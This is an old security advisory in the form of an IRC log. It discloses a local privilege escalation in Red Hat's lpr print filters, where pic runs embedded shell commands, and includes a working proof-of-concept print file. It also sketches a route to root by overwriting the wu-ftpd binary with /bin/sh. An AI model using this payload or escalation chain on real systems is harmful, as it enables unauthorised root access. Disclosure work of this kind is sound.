details of an exploit agains lpr-0.50-4 (at least) (also affects other systems that may have the same print filters) URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt AFFECTS : lpr-0.50-4 & earlier SEVERITY : local ROOT possible. SYNOPSIS : escalation of group permissions, leading to exploit for every user except root is available. root is sometimes available as well. (wu-ftpd-2.6.0-14.6x binaries are owned by user bin, and can be overwritten allowing root access if wu-ftpd is installed.) http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt This is a log of an advisory given in channel #roothat on irc.pulltheplug.com, October 16 2000. !!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!! --> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat --- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer printer and j00 get a new group of friends. and stuff. --- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000 --- noid gives channel operator status to zen-parse hey zen zen-parse lockdown lo all what's this topic all about then zen? new hole in lpr package for redhat and... ;] you releasing it ? --> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat [zen@continuity /tmp]$ id uid=500(zen) gid=500(zen) groups=500(zen) [zen@continuity /tmp]$ cat asdf .PS sh D/usr/bin/id>/tmp/yougetanyideasyetD .PF [zen@continuity /tmp]$ lpr asdf [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetany ideasyet uid=500(zen) gid=500(zen) groups=7(lp) [zen@continuity /tmp]$ consider it released erm... missing a line... heh and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideas yet -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougeta nyideasyet as the output only gid lp ? ehm heh but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr * <-- schematic|ZzZz has quit (Ping timeout) thats not where the magic happens though. ;] needs a running lpd and a printer that does troff eg: PostScript cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi zen...write a bugtraq advisory but get really really stoned first. hehe `grog -Tps -msafer $TMP_FILE` log this... use this as an advisory. ;] that is where the magic happens. grog is a perl script that selects the correct command line options for groff. groff can, if asked run a variety of other programs, such as eqn(fo r equations) tbl(for tables) and pic(for compiling pictures). the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file. However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode. zen-parse The lpd checks what type of file the file is with a program called file hmm looks perty yummy the type of this file is troff or preprocessor... <-- possem has quit (Quit: ) so the daemon then it hands it to the apropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi which contains the grog command, which causes groff to run pic on t he file, and pic executes the file we speciify as the user the file was printed by. with one exception. you have been set to have a list of groups which just contains one group. lp hmm (btw: group lp can edit all the configuration files for lpd. lpd ca n run the commands as any user (except root). however, if u have wuftpd installed, there is a root exploit. -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in .ftpd lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu .ftpd -> in.ftpd gain user bin, and copy /bin/sh over in.ftpd heh telnet to port 21, and you have root. so it is a root exploit on sy stems with wufptd. and just every other uid on systems with lpd runnning. ) heh, nice there also appears to be an error file attempting to be made just a fter priviledges are dropped, but it has insuficient writes at that moment to a ctually succeed. the directory is owned by root, and only has lp write access b ecause the lpd runs as root. um. you dats my advisory ;] --- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|a fk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D ew -- zen-parse ;] hehe i lik eyer bigtraq posts better... ya get all the leeto ascii in there and all... ok... now ima save the buffer and submit it to bugtraq ;] kewl --> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat that'd be a cool advisory !!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!! Ob-ASCII /\/\ mee-errraaAAgghhhraher! = oo = / \()/ / / __ \ || || in memory of lucky. Send someone a cool Dynamitemail flashcard greeting!! And get rewarded. GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41